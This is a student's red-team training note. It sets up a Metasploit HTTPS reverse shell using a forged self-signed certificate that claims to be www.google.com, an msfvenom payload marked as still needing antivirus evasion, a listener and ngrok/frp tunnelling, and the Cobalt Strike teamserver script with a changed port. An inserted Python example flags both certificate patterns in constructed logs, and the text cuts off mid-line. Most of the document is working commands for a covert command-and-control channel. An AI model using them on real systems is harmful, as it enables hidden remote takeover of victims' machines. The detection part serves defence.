Source | MS08067 Red Team Training Class, Session 5
Author: thresh (student, Red Team Training Class session 5)
Using an HTTPS listener in MSF
1. Certificate generation:
The openssl command used to generate the (forged, self-signed) certificate:
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
  -subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
  -keyout www.google.com.key \
  -out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt
2. Generate the HTTPS payload (the generated payload still needs AV-evasion processing)
msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.80.134 lport=7777 \
  PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem PayloadUUIDName=xyh \
  -f exe -o payload.exe
3. Start the listener in MSF
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.80.134
set lport 7777
set handlersslcert /home/thresh/MSF/cert_file/www.google.com.pem
set stagerverifysslcert true
run
Connection established.
The traffic captured in Wireshark is encrypted.
Fronting MSF with ngrok
This is really just intranet tunneling; the same effect can be achieved with an frp mapping. A Kali box on one internal network can reach another internal network through the VPS.
Map the locally listened port to a specified port on the VPS; the reverse shell connects to that VPS port and thereby reaches the local MSF handler.
Using CS
For CS usage, refer to the Cobalt Strike official site: https://www.cobaltstrike.com/
Cobalt Strike basics: https://www.bilibili.com/video/BV1754y1Q7im?p=3&spm_id_from=333.1007.top_right_bar_window_history.content.click
CS: changing the default port
The default port is 50050; here it is changed to 5555.
Edit the start script (vim teamserver) and change the -Dcobaltstrike.server_port value in the final java line:
#!/bin/bash
#
# Start Cobalt Strike Team Server
#
# make pretty looking messages (thanks Carlos)
function print_good () {
    echo -e "\x1B[01;32m[+]\x1B[0m $1"
}
function print_error () {
    echo -e "\x1B[01;31m[-]\x1B[0m $1"
}
function print_info () {
    echo -e "\x1B[01;34m[*]\x1B[0m $1"
}
# check that we're r00t
if [ $UID -ne 0 ]; then
    print_error "Superuser privileges are required to run the team server"
    exit
fi
# check if java is available...
if [ $(command -v java) ]; then
    true
else
    print_error "java is not in $PATH"
    echo "    is Java installed?"
    exit
fi
# check if keytool is available...
if [ $(command -v keytool) ]; then
    true
else
    print_error "keytool is not in $PATH"
    echo "    install the Java Developer Kit"
    exit
fi
# generate a certificate
# naturally you're welcome to replace this step with your own permanent certificate.
# just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
# -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
# an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
# is printed so users may have a chance to verify they're not being owned.
if [ -e ./cobaltstrike.store ]; then
    print_info "Will use existing X509 certificate and keystore (for SSL)"
else
    print_info "Generating X509 certificate and keystore (for SSL)"
    keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"
fi
# start the team server.
# -Dcobaltstrike.server_port=50050 is the default port; change it to the port you want (5555 in this walkthrough).
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*
Connect to the team server.
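Both certificates on this page leave a recognisable mark on the wire: the self-signed certificate from section 1 carries CN=www.google.com with subject equal to issuer, and the teamserver script's keytool line stamps "Major Cobalt Strike" into its default keystore. The following added example (not from the original post) flags both patterns in constructed Zeek-style ssl.log records; the field order in FIELDS, the WATCH_CNS set and the sample records are assumptions.

```python
# Added example (not from the original post): flag, in constructed Zeek-style
# ssl.log records, the two certificate patterns shown on this page.
# Assumed field order for the constructed records (not Zeek's full schema).
FIELDS = ["ts", "id.orig_h", "id.resp_h", "id.resp_p",
          "server_name", "subject", "issuer", "validation_status"]
# Subject values the teamserver script's keytool line bakes into its keystore.
CS_DEFAULT = {"CN": "Major Cobalt Strike", "OU": "AdvancedPenTesting",
              "O": "cobaltstrike"}
# CNs a self-signed certificate should never carry on a monitored network;
# www.google.com is the value from the openssl command in section 1 (assumption).
WATCH_CNS = {"www.google.com"}

# Constructed records using TEST-NET addresses; not real traffic.
CS_DN = ("CN=Major Cobalt Strike,OU=AdvancedPenTesting,O=cobaltstrike,"
         "L=Somewhere,ST=Cyberspace,C=Earth")
FAKE_DN = "CN=www.google.com,O=Development,L=London,ST=London,C=UK"
SAMPLE_LOG = [
    "1700000000.1\t10.0.0.5\t203.0.113.10\t7777\twww.google.com\t%s\t%s\t"
    "self signed certificate" % (FAKE_DN, FAKE_DN),
    "1700000000.2\t10.0.0.5\t203.0.113.11\t50050\t-\t%s\t%s\t"
    "self signed certificate" % (CS_DN, CS_DN),
    "1700000000.3\t10.0.0.5\t203.0.113.12\t443\twww.google.com\t"
    "CN=www.google.com\tCN=Example Public CA,O=Example Trust\tok",
]


def parse_dn(dn):
    """'CN=a,O=b' -> {'CN': 'a', 'O': 'b'}; escaped commas are not handled."""
    pairs = (p.split("=", 1) for p in dn.split(",") if "=" in p)
    return {k.strip().upper(): v.strip() for k, v in pairs}


def analyze_record(line):
    """Return the list of findings for one ssl.log line."""
    rec = dict(zip(FIELDS, line.rstrip("\n").split("\t")))
    subject, issuer = parse_dn(rec["subject"]), parse_dn(rec["issuer"])
    findings = []
    if all(subject.get(k) == v for k, v in CS_DEFAULT.items()):
        findings.append("default Cobalt Strike teamserver certificate")
    self_signed = (subject == issuer
                   or rec["validation_status"] == "self signed certificate")
    if self_signed and subject.get("CN") in WATCH_CNS:
        findings.append("self-signed certificate claiming " + subject["CN"])
    return findings


def scan_log(lines):
    """Return (id.resp_h, id.resp_p, finding) for every flagged record."""
    return [(line.split("\t")[2], line.split("\t")[3], finding)
            for line in lines for finding in analyze_record(line)]
```

The third sample record, a CA-issued certificate for the same CN, produces no finding, which is the point: the rule keys on self-signed status plus the claimed name, not on the name alone.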
CS: changing the certificate
Default certificate file
Inspect the certificate; the default keystore password is 123456.
┌──(root